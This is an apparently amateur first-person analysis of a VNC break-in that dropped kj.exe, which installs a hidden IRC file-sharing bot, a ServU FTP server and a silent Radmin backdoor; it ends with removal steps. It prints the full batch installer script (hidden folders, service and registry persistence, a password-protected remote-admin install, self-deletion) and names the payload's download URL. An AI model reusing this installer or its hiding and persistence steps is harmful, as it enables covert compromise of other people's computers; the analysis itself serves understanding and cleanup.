kj.exe turning into Ms-java.exe, userlist.exe, and mssvc.exe

An AOL customer found my Server with VNC and broke in. This was not a script, I don't think. When a script knocks on the VNC door, the packet captures show a lot of "key event" entries, but this was a lot of "pointer events" and framebuffer updates. I think that this guy must actually be sat behind his computer doing this to vulnerable computers he has been scanning automatically.

AOL man has Server download kj.exe from http://freewebtowns.com/scooby68/kj.exe. This is a self-extracting archive containing lots of little (and not so little) proggies, all to be hidden in the Windows\Driver Cache\i386 directory. The default Windows installation cannot even look into this directory as it is hidden.

The noticable files here are cygwin, a sort of Linux emulator for Windows, and ServU, an ftp server.Good start. Now for the less obvious files.

Since the setup is going to invoke env.bat first, I will look at that first too, so as to get an idea of what is going to happen.

env.bat
rem @echo off
echo Setting Environment Variable for Rootkit's Root Folder
cd %windir%\Driver~1\i386
echo user_nick [rmb]-music-%RANDOM% >> xdcc.config

echo [settings] > ms-java.ini
echo ServiceName = Ms-java >> ms-java.ini
echo ProcCount = 2 >> ms-java.ini
echo CheckProcess = 1 >> ms-java.ini

echo [Process0] >> ms-java.ini
echo CommandLine = %windir%\Driver~1\i386\userlist.exe xdcc.config >> ms-java.ini
echo WorkingDir =  %windir%\Driver~1\i386\ >> ms-java.ini
echo PauseStart = 1000 >> ms-java.ini
echo PauseEnd = 1000 >> ms-java.ini
echo UserInterface = no >> ms-java.ini
echo Restart = Yes >> ms-java.ini

echo [Process1] >> ms-java.ini
echo CommandLine = %windir%\Driver~1\i386\mssvc.exe >> ms-java.ini
echo WorkingDir =  %windir%\Driver~1\i386\ >> ms-java.ini
echo PauseStart = 1000 >> ms-java.ini
echo PauseEnd = 1000 >> ms-java.ini
echo UserInterface = no >> ms-java.ini
echo Restart = Yes >> ms-java.ini
mkdir security
attrib +sh security
ms-java -i
net start ms-java
if exist c:\windows\command.com goto WIN98
goto END

:WIN98
echo REGEDIT4 > xdcc.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] >> xdcc.reg
echo "LoadPowerProfiles"="driver~1\\i386\\run.bat" >> xdcc.reg
attrib +h ..\..\driver~1
regedit /s xdcc.reg
start /m run.bat
goto END

:END
c:\winnt\system32\r_server.exe /pass:datasafe /port:4899 /silence /save
c:\windows\system32\r_server.exe /pass:datasafe /port:4899 /silence /save
c:\progra~1\radmin\r_server.exe /pass:datasafe /port:4899 /silence /save
%windir%\system32\r_server.exe /pass:datasafe /port:4899 /silence /save
ms-java -i
net start ms-java
:ERASING
k setup
k micha
del c:\rars.exe
del c:\micha.exe
del c:\root.exe
del \kj.exe
del \micha.exe
del \setup.exe
del \update.exe
if EXIST \kj.exe goto ERASING
if EXIST \root.exe goto ERASING
if EXIST \micha.exe goto ERASING
if EXIST \update.exe goto ERASING
del xdcc.reg
del env.bat

Surely this blighter is not a rootkit? I think these virus people might be taking themselves a little bit overly serious...

Well what is this thing doing then. It is writing additional lines to some .ini files. First off a random user name for xdcc.config followed by the creation of ms-java, and ending with the attempts to erase files that weren't even included in this distribution.

Here is the ms-java.ini that has been created:

ms-java.ini
[settings]
ServiceName = Ms-java
ProcCount = 2
CheckProcess = 1
[Process0]
CommandLine = F:\WINDOWS\Driver~1\i386\userlist.exe xdcc.config
WorkingDir =  F:\WINDOWS\Driver~1\i386\
PauseStart = 1000
PauseEnd = 1000
UserInterface = no
Restart = Yes
[Process1]
CommandLine = F:\WINDOWS\Driver~1\i386\mssvc.exe
WorkingDir =  F:\WINDOWS\Driver~1\i386\
PauseStart = 1000
PauseEnd = 1000
UserInterface = no

Restart = Yes

Ms-java is registered as a service. This is the program that is going to make sure that both userlist.exe and mssvc.exe are going to be restarted if someone had the gall to stop them. So, what is userlist.exe? It takes xdcc.config as it's parameter, so we shall look at it now.

xdcc.config

## edit only these 3 commands ##
user_realname Peace
loginname ME
## love me  ##

pidfile spoolvc.dll
logfile svchost.dll
logstats no
logrotate monthly
connectionmethod direct
statefile mybot.state

###                         - server information -                         ###
server irc.1andallIRC.net 6667
#-chans---------------------------|
channel #xboxland-mp3 -plist 40
user_modes +i

tcprangestart 1024
slotsmax 1
queuesize 50
maxtransfersperperson 1
maxqueueditemsperperson 1
filedir security/
restrictlist
restrictprivlist
restrictprivlistmsg Wait for public list in the channel.
restrictsend
respondtochannelxdcc
respondtochannellist
downloadhost *!*@*
lowbdwth 1
transfermaxspeed 2000
overallmaxspeed 6000

overallmaxspeeddayspeed 6000

adminpass U1BJUklU
adminhost *!*@*busy.as.a.bea
adminhost *!*@*i.am.not.amused
adminhost *!*@*bark@the.moon

uploadhost *!*@*
uploaddir security
hideos
notifytime 25
headline    4Only 6the 8best 9from 12#xboxland-mp3

creditline  4Only 6the 8best 9from 12#xboxland-mp3

#############################
###                        ##
### DO NOT EDIT THIS PART  ##
###                        ##
#############################

user_nick [rmb]-music-7245

This is going to want to log into an IRC server. This is also where the problems begin.

After installing this virus, it gives a load of error messages, something that flashed by quickly about 16-bit incompatibility. And then it would not connect to this IRC server for love nor money. The very good thing is that troubleshooting tools are included in this package of malware: the virus does logging. And this is what the log has to say:

EROOR: adminpass is not encrypted!

iroffer exited (Error)

Great work. To me, U1BJUklU looked fairly encrypted, but it's no good. I google this bunch of letters and find that a faulty SQL server somewhere has mangled a username "SPIRIT" into this exact combination. This is UTF-8 or something, not what iroffer wants. I take the password protection off, and this time it runs. I try to find out how to reencode the password. It seems that iroffer has a -c parameter that will prepare the right phrase. As I am doing this, AOL man actually comes along and tries to log into his IRC bot. He uses the password SPIRIT. Wow. But he is rejected. Rather than allowing all when there is no set password, it appears iroffer allows none. Before I'm done, AOL Man and his Mate from BT have both tried to log in on numerous occasions, trying nine different passwords twelve times. This must mean that they a) don't always use the same password, and b) don't always remember which bot gets sent where.

Back online with a newly encrypted password, but AOL Man presumably only does this when he comes home from school, college or god forbid the office. Around ten past five in the afternoon seems to be his favourite time... Plenty of time to find out about the ServU.

Apparently the reason hackercrackers use the ServU is because it is so darned easy to use. Install and away you go, with a lovely GUI and whatnot. I dowload a trial version of the ServU. I install the client ("ServU Administrator") on Server, where it finds its server companion right away despite it being run on a different port, and with a different name. Keep up the good work. I create an administrator-user, then log on from my machine.

There are two users pre-created on this server, bread and sparky. They don't have administrative privileges. I google around to find that this is common sense for these hackertypes, since it's not altogether that hard to break into one of these things, and your rival could lock you out with great ease.

I wait for files to be uploaded. but nothing happens in this respect -- four days on, still no joy. (Having said that, my big machine with the VMware was offline with poorly processors yesterday).

There is action on the IRC front before long though: someone comes round to upload "Seventies Heart Throbs". I ask you. Of all the mp3's they could have given me here, what the hell was that for?

I used mIRC to hang around in the channel I was directed to (#XBOXLAND-MP3) and found that /list worked. There were quite a few channels, with warez and music and gamez and appz and whatever else. Of all the channels they could have assigned me to, why did I have to get this one? Also these channels were very busy indeed, a lot more "customers" than bots. Googling around found that there are even websites which index the bots in these channels. Amazing what you can find on the web. http://ircdig.com/ for instance. Here's a snippet of that, having searched for the room which Server is hanging out in:

There are lots of them, and it is amazing to think that more or less all (presumably) these "servers" or "bots" are computers belonging to people who have no idea that they are partaking in this. "The internet is slow" or "I have a weird process running" is as good as it gets.

Anyways, Beauty!offer2@1andallIRC-E1F40AAE.static.reverse.layeredtech.com (72.36.197.250) uploads these heart throbs. The best thing about running these virus programs is that if you do it yourself you can run them in a command window that doesn't close right away, unlike the hapless infectee. This means you get all the output. Beauty was able to offload 70 MB of heart throb music at 275 KB/s apparently. I never knew I had upload speeds like that, it's over 2 meg! Have Be put me on the enhanced pack without telling me?

Next day at ten past five, in comes AOL Man. He checks his messages. There is one: some spam came in the night. He deletes it. Then he checks to see what files if any have been uploaded, and leaves. Well actually he doesn't leave, since the connection stays active, and therefore noticeable, but from the IRC channel I see he has a ping timeout. His client end to iroffer should be slightly less careless. This is a dead giveaway, surely.

The day after that, which was yesterday, we were offline what with the processor trouble. Since it has been back up, there's been much dawdling on the mp3 channel, but no activity. It is 10 past 5 now...

Perhaps our AOL Man has grown suspicious? I hope not. The fact that the webserver runs from the same IP doesn't normally seem to deter them one bit.

Removal

First, unplug your network cable or modem. Browse to your Windows\Driver Cache\i386 directory. Here are the nasties. Right click on My Computer, then "Manage." Go to Services. Here you will find the Ms-java service. Stop the service, and set to not start up. Now bring up the task manager, and kill Ms-java, Mssvc.exe and userlist.exe. Make sure they don't come back. If need be, restart the computer (in safe mode even). If you have set the Ms-java service to disabled, the virus won't run. Now delete the whole contents of the i386 directory, apart from the driver.cab which is legit and needed. Now run regedit, navigate to HKLM\SYSTEM|CurrentControlSet\Services, and find ms-java. Right click on it in the left hand column and delete the whole thing.